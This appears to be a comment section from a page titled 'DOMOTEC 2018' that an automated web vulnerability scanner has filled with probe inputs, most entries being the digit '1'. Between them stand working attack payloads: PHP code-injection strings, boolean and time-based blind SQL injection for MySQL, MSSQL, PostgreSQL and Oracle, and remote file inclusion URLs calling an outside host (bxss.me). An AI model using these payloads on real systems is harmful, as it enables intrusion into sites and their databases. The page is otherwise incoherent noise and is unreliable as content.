DOMOTEC 2018
155 Comment(s)
1
1
1
1
1
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
1some_inexistent_file_with_long_name .jpg
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
bxss.me
1
1
1
1
1
1
1
1
1
1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
';print(md5(31337));$a='
";print(md5(31337));$a="
${@print(md5(31337))}
${@print(md5(31337))}\
'.print(md5(31337)).'
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
-1 OR 2+565-565-1=0+0+0+1 --
-1 OR 3+565-565-1=0+0+0+1 --
-1 OR 2+274-274-1=0+0+0+1
-1 OR 3+274-274-1=0+0+0+1
-1' OR 2+900-900-1=0+0+0+1 --
-1' OR 3+900-900-1=0+0+0+1 --
-1' OR 2+65-65-1=0+0+0+1 or 'kg5RtIzD'='
-1' OR 3+65-65-1=0+0+0+1 or 'kg5RtIzD'='
-1" OR 2+459-459-1=0+0+0+1 --
-1" OR 3+459-459-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
CIAinRah'; waitfor delay '0:0:15' --
-5 OR 701=(SELECT 701 FROM PG_SLEEP(15))--
-5) OR 917=(SELECT 917 FROM PG_SLEEP(15))--
-1)) OR 809=(SELECT 809 FROM PG_SLEEP(15))--
y8oxhFzo' OR 68=(SELECT 68 FROM PG_SLEEP(15))--
CbpeiZat') OR 555=(SELECT 555 FROM PG_SLEEP(15))--
n5jivwBu')) OR 399=(SELECT 399 FROM PG_SLEEP(15))--
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@w43u4
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
1
1